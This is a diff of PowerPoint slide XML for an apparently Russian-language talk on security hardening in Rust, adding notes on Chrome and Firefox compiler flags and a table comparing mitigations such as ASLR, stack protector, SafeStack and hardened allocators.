+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>O2</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>)</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -22924,7 +22889,7 @@
         <p:spPr/>
         <p:txBody>
           <a:bodyPr>
-            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
+            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
@@ -23138,12 +23103,65 @@
             <a:pPr lvl="1"/>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t>TODO: </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>проверить сколько пакетов используют эти флаги (как ?)</a:t>
-            </a:r>
+              <a:t>Chrome </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>собирается со всеми тремя флагами</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="2"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:hlinkClick r:id="rId2"/>
+              </a:rPr>
+              <a:t>build/config/compiler/BUILD.gn</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Firefox </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0">
+                <a:hlinkClick r:id="rId3"/>
+              </a:rPr>
+              <a:t>собирается</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t> с </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>fno</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-strict-aliasing</a:t>
+            </a:r>
+            <a:endParaRPr lang="ru-RU" dirty="0">
+              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+            </a:endParaRPr>
           </a:p>
           <a:p>
             <a:endParaRPr lang="en-US" dirty="0"/>
@@ -23594,8 +23612,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="6620435" y="1825625"/>
-            <a:ext cx="5192874" cy="4351338"/>
+            <a:off x="5316071" y="1825625"/>
+            <a:ext cx="6497238" cy="4351338"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -23603,7 +23621,7 @@
         </p:spPr>
         <p:txBody>
           <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0">
-            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
+            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
           </a:bodyPr>
           <a:lstStyle>
             <a:lvl1pPr marL="228600" indent="-228600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
@@ -24972,7 +24990,12 @@
             <p:ph type="title"/>
           </p:nvPr>
         </p:nvSpPr>
-        <p:spPr/>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="838200" y="365125"/>
+            <a:ext cx="8232402" cy="1325563"/>
+          </a:xfrm>
+        </p:spPr>
         <p:txBody>
           <a:bodyPr/>
           <a:lstStyle/>
@@ -25219,8 +25242,8 @@
         </p:blipFill>
         <p:spPr>
           <a:xfrm>
-            <a:off x="8924645" y="1123688"/>
-            <a:ext cx="3088061" cy="900374"/>
+            <a:off x="8335496" y="620417"/>
+            <a:ext cx="2601445" cy="758493"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -25853,42 +25876,6 @@
             <a:endParaRPr lang="ru-RU" dirty="0"/>
           </a:p>
           <a:p>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>C</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>hecksec не обнаруживает</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>LLVM CFI (непонятно как это сделать)</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>и Intel CET (</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0">
-                <a:hlinkClick r:id="rId5"/>
-              </a:rPr>
-              <a:t>checksec #302</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>)</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
         </p:txBody>
@@ -26023,7 +26010,12 @@
             <p:ph type="title"/>
           </p:nvPr>
         </p:nvSpPr>
-        <p:spPr/>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="497541" y="-74146"/>
+            <a:ext cx="10515600" cy="1325563"/>
+          </a:xfrm>
+        </p:spPr>
         <p:txBody>
           <a:bodyPr/>
           <a:lstStyle/>
@@ -26039,39 +26031,1092 @@
           </a:p>
         </p:txBody>
       </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="3" name="Content Placeholder 2">
+      <p:graphicFrame>
+        <p:nvGraphicFramePr>
+          <p:cNvPr id="6" name="Table 6">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96C21F0C-8FF4-4018-A61F-929A5D718CAE}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B100581C-268E-4180-9009-ACDCF3C31CEE}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
+          <p:cNvGraphicFramePr>
+            <a:graphicFrameLocks noGrp="1"/>
+          </p:cNvGraphicFramePr>
           <p:nvPr>
-            <p:ph idx="1"/>
+            <p:extLst>
+              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
+                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3884600814"/>
+              </p:ext>
+            </p:extLst>
           </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr/>
-        <p:txBody>
-          <a:bodyPr/>
-          <a:lstStyle/>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>TODO: </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>таблица со сравнением</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
+        </p:nvGraphicFramePr>
+        <p:xfrm>
+          <a:off x="1270746" y="1018091"/>
+          <a:ext cx="9650508" cy="5578290"/>
+        </p:xfrm>
+        <a:graphic>
+          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
+            <a:tbl>
+              <a:tblPr firstRow="1" bandRow="1">
+                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
+              </a:tblPr>
+              <a:tblGrid>
+                <a:gridCol w="2012576">
+                  <a:extLst>
+                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
+                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4226136556"/>
+                    </a:ext>
+                  </a:extLst>
+                </a:gridCol>
+                <a:gridCol w="3272118">
+                  <a:extLst>
+                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
+                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1905133483"/>
+                    </a:ext>
+                  </a:extLst>
+                </a:gridCol>
+                <a:gridCol w="2483223">
+                  <a:extLst>
+                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
+                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4013930117"/>
+                    </a:ext>
+                  </a:extLst>
+                </a:gridCol>
+                <a:gridCol w="1882591">
+                  <a:extLst>
+                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
+                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="697534993"/>
+                    </a:ext>
+                  </a:extLst>
+                </a:gridCol>
+              </a:tblGrid>
+              <a:tr h="406450">
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="ru-RU" dirty="0"/>
+                        <a:t>Защита</a:t>
+                      </a:r>
+                      <a:endParaRPr lang="en-US" dirty="0"/>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr"/>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="ru-RU" dirty="0"/>
+                        <a:t>Актуальность</a:t>
+                      </a:r>
+                      <a:endParaRPr lang="en-US" dirty="0"/>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr"/>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="ru-RU" dirty="0"/>
+                        <a:t>Статус в </a:t>
+                      </a:r>
+                      <a:r>
+                        <a:rPr lang="en-US" dirty="0"/>
+                        <a:t>Rust</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr"/>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="ru-RU" dirty="0"/>
+                        <a:t>Замечания</a:t>
+                      </a:r>
+                      <a:endParaRPr lang="en-US" dirty="0"/>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr/>
+                </a:tc>
+                <a:extLst>
+                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
+                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2621139126"/>
+                  </a:ext>
+                </a:extLst>
+              </a:tr>
+              <a:tr h="406450">
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" dirty="0" err="1"/>
+                        <a:t>Noexecstack</a:t>
+                      </a:r>
+                      <a:endParaRPr lang="en-US" dirty="0"/>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr"/>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
+                        <a:lnSpc>
+                          <a:spcPct val="100000"/>
+                        </a:lnSpc>
+                        <a:spcBef>
+                          <a:spcPts val="0"/>
+                        </a:spcBef>
+                        <a:spcAft>
+                          <a:spcPts val="0"/>
+                        </a:spcAft>
+                        <a:buClrTx/>
+                        <a:buSzTx/>
+                        <a:buFontTx/>
+                        <a:buNone/>
+                        <a:tabLst/>
+                        <a:defRPr/>
+                      </a:pPr>
+                      <a:r>
+                        <a:rPr lang="ru-RU" dirty="0"/>
+                        <a:t>Только </a:t>
+                      </a:r>
+                      <a:r>
+                        <a:rPr lang="en-US" dirty="0"/>
+                        <a:t>unsafe/</a:t>
+                      </a:r>
+                      <a:r>
+                        <a:rPr lang="ru-RU" dirty="0"/>
+                        <a:t>внешний код</a:t>
+                      </a:r>
+                      <a:endParaRPr lang="en-US" dirty="0"/>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr"/>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="ru-RU" dirty="0"/>
+                        <a:t>Включена</a:t>
+                      </a:r>
+                      <a:endParaRPr lang="en-US" dirty="0"/>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr"/>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:r>
+                        <a:rPr lang="en-US" dirty="0" err="1">
+                          <a:hlinkClick r:id="rId2"/>
+                        </a:rPr>
+                        <a:t>Prooflink</a:t>
+                      </a:r>
+                      <a:endParaRPr lang="en-US" dirty="0"/>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr"/>
+                </a:tc>
+                <a:extLst>
+                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
+                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="254780261"/>
+                  </a:ext>
+                </a:extLst>
+              </a:tr>
+              <a:tr h="406450">
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" dirty="0"/>
+                        <a:t>ASLR</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr"/>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
+                        <a:lnSpc>
+                          <a:spcPct val="100000"/>
+                        </a:lnSpc>
+                        <a:spcBef>
+                          <a:spcPts val="0"/>
+                        </a:spcBef>
+                        <a:spcAft>
+                          <a:spcPts val="0"/>
+                        </a:spcAft>
+                        <a:buClrTx/>
+                        <a:buSzTx/>
+                        <a:buFontTx/>
+                        <a:buNone/>
+                        <a:tabLst/>
+                        <a:defRPr/>
+                      </a:pPr>
+                      <a:r>
+                        <a:rPr lang="ru-RU" dirty="0"/>
+                        <a:t>Только </a:t>
+                      </a:r>
+                      <a:r>
+                        <a:rPr lang="en-US" dirty="0"/>
+                        <a:t>unsafe/</a:t>
+                      </a:r>
+                      <a:r>
+                        <a:rPr lang="ru-RU" dirty="0"/>
+                        <a:t>внешний код</a:t>
+                      </a:r>
+                      <a:endParaRPr lang="en-US" dirty="0"/>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr"/>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="ru-RU" dirty="0"/>
+                        <a:t>Включена</a:t>
+                      </a:r>
+                      <a:endParaRPr lang="en-US" dirty="0"/>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr"/>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:r>
+                        <a:rPr lang="en-US" dirty="0" err="1">
+                          <a:hlinkClick r:id="rId3"/>
+                        </a:rPr>
+                        <a:t>Prooflink</a:t>
+                      </a:r>
+                      <a:endParaRPr lang="en-US" dirty="0"/>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr"/>
+                </a:tc>
+                <a:extLst>
+                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
+                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1801720213"/>
+                  </a:ext>
+                </a:extLst>
+              </a:tr>
+              <a:tr h="406450">
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" dirty="0"/>
+                        <a:t>Stack Protector</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr"/>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
+                        <a:lnSpc>
+                          <a:spcPct val="100000"/>
+                        </a:lnSpc>
+                        <a:spcBef>
+                          <a:spcPts val="0"/>
+                        </a:spcBef>
+                        <a:spcAft>
+                          <a:spcPts val="0"/>
+                        </a:spcAft>
+                        <a:buClrTx/>
+                        <a:buSzTx/>
+                        <a:buFontTx/>
+                        <a:buNone/>
+                        <a:tabLst/>
+                        <a:defRPr/>
+                      </a:pPr>
+                      <a:r>
+                        <a:rPr lang="ru-RU" dirty="0"/>
+                        <a:t>Только </a:t>
+                      </a:r>
+                      <a:r>
+                        <a:rPr lang="en-US" dirty="0"/>
+                        <a:t>unsafe/</a:t>
+                      </a:r>
+                      <a:r>
+                        <a:rPr lang="ru-RU" dirty="0"/>
+                        <a:t>внешний код</a:t>
+                      </a:r>
+                      <a:endParaRPr lang="en-US" dirty="0"/>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr"/>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" dirty="0"/>
+                        <a:t>Nightly-</a:t>
+                      </a:r>
+                      <a:r>
+                        <a:rPr lang="ru-RU" dirty="0"/>
+                        <a:t>опция</a:t>
+                      </a:r>
+                      <a:endParaRPr lang="en-US" dirty="0"/>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr"/>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:r>
+                        <a:rPr lang="en-US" dirty="0" err="1">
+                          <a:hlinkClick r:id="rId4"/>
+                        </a:rPr>
+                        <a:t>Prooflink</a:t>
+                      </a:r>
+                      <a:endParaRPr lang="en-US" dirty="0"/>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr"/>
+                </a:tc>
+                <a:extLst>
+                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
+                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1636600248"/>
+                  </a:ext>
+                </a:extLst>
+              </a:tr>
+              <a:tr h="406450">
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" dirty="0"/>
+                        <a:t>Safe Stack</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr"/>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
+                        <a:lnSpc>
+                          <a:spcPct val="100000"/>
+                        </a:lnSpc>
+                        <a:spcBef>
+                          <a:spcPts val="0"/>
+                        </a:spcBef>
+                        <a:spcAft>
+                          <a:spcPts val="0"/>
+                        </a:spcAft>
+                        <a:buClrTx/>
+                        <a:buSzTx/>
+                        <a:buFontTx/>
+                        <a:buNone/>
+                        <a:tabLst/>
+                        <a:defRPr/>
+                      </a:pPr>
+                      <a:r>
+                        <a:rPr lang="ru-RU" dirty="0"/>
+                        <a:t>Только </a:t>
+                      </a:r>
+                      <a:r>
+                        <a:rPr lang="en-US" dirty="0"/>
+                        <a:t>unsafe/</a:t>
+                      </a:r>
+                      <a:r>
+                        <a:rPr lang="ru-RU" dirty="0"/>
+                        <a:t>внешний код</a:t>
+                      </a:r>
+                      <a:endParaRPr lang="en-US" dirty="0"/>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr"/>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" dirty="0"/>
+                        <a:t>Nightly-</a:t>
+                      </a:r>
+                      <a:r>
+                        <a:rPr lang="ru-RU" dirty="0"/>
+                        <a:t>опция</a:t>
+                      </a:r>
+                      <a:endParaRPr lang="en-US" dirty="0"/>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr"/>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:r>
+                        <a:rPr lang="en-US" dirty="0" err="1">
+                          <a:hlinkClick r:id="rId5"/>
+                        </a:rPr>
+                        <a:t>Prooflink</a:t>
+                      </a:r>
+                      <a:endParaRPr lang="en-US" dirty="0"/>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr"/>
+                </a:tc>
+                <a:extLst>
+                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
+                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="86468879"/>
+                  </a:ext>
+                </a:extLst>
+              </a:tr>
+              <a:tr h="406450">
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" dirty="0"/>
+                        <a:t>Stack Clashing</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr"/>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="ru-RU" dirty="0"/>
+                        <a:t>Актуальна</a:t>
+                      </a:r>
+                      <a:endParaRPr lang="en-US" dirty="0"/>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr"/>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="ru-RU" dirty="0"/>
+                        <a:t>Включена</a:t>
+                      </a:r>
+                      <a:endParaRPr lang="en-US" dirty="0"/>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr"/>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:r>
+                        <a:rPr lang="en-US" dirty="0" err="1">
+                          <a:hlinkClick r:id="rId6"/>
+                        </a:rPr>
+                        <a:t>Prooflink</a:t>
+                      </a:r>
+                      <a:endParaRPr lang="en-US" dirty="0"/>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr"/>
+                </a:tc>
+                <a:extLst>
+                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
+                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4019088140"/>
+                  </a:ext>
+                </a:extLst>
+              </a:tr>
+              <a:tr h="406450">
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
+                        <a:lnSpc>
+                          <a:spcPct val="100000"/>
+                        </a:lnSpc>
+                        <a:spcBef>
+                          <a:spcPts val="0"/>
+                        </a:spcBef>
+                        <a:spcAft>
+                          <a:spcPts val="0"/>
+                        </a:spcAft>
+                        <a:buClrTx/>
+                        <a:buSzTx/>
+                        <a:buFontTx/>
+                        <a:buNone/>
+                        <a:tabLst/>
+                        <a:defRPr/>
+                      </a:pPr>
+                      <a:r>
+                        <a:rPr lang="en-US" dirty="0"/>
+                        <a:t>_FORTIFY_SOURCE, STL hardening</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr"/>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
+                        <a:lnSpc>
+                          <a:spcPct val="100000"/>
+                        </a:lnSpc>
+                        <a:spcBef>
+                          <a:spcPts val="0"/>
+                        </a:spcBef>
+                        <a:spcAft>
+                          <a:spcPts val="0"/>
+                        </a:spcAft>
+                        <a:buClrTx/>
+                        <a:buSzTx/>
+                        <a:buFontTx/>
+                        <a:buNone/>
+                        <a:tabLst/>
+                        <a:defRPr/>
+                      </a:pPr>
+                      <a:r>
+                        <a:rPr lang="ru-RU" dirty="0"/>
+                        <a:t>Нет</a:t>
+                      </a:r>
+                      <a:endParaRPr lang="en-US" dirty="0"/>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr"/>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="ru-RU" dirty="0"/>
+                        <a:t>Нет</a:t>
+                      </a:r>
+                      <a:endParaRPr lang="en-US" dirty="0"/>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr"/>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:r>
+                        <a:rPr lang="ru-RU" dirty="0"/>
+                        <a:t>Встроенные проверки</a:t>
+                      </a:r>
+                      <a:endParaRPr lang="en-US" dirty="0"/>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr"/>
+                </a:tc>
+                <a:extLst>
+                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
+                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3897187528"/>
+                  </a:ext>
+                </a:extLst>
+              </a:tr>
+              <a:tr h="406450">
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" dirty="0"/>
+                        <a:t>Hardened allocator</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr"/>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
+                        <a:lnSpc>
+                          <a:spcPct val="100000"/>
+                        </a:lnSpc>
+                        <a:spcBef>
+                          <a:spcPts val="0"/>
+                        </a:spcBef>
+                        <a:spcAft>
+                          <a:spcPts val="0"/>
+                        </a:spcAft>
+                        <a:buClrTx/>
+                        <a:buSzTx/>
+                        <a:buFontTx/>
+                        <a:buNone/>
+                        <a:tabLst/>
+                        <a:defRPr/>
+                      </a:pPr>
+                      <a:r>
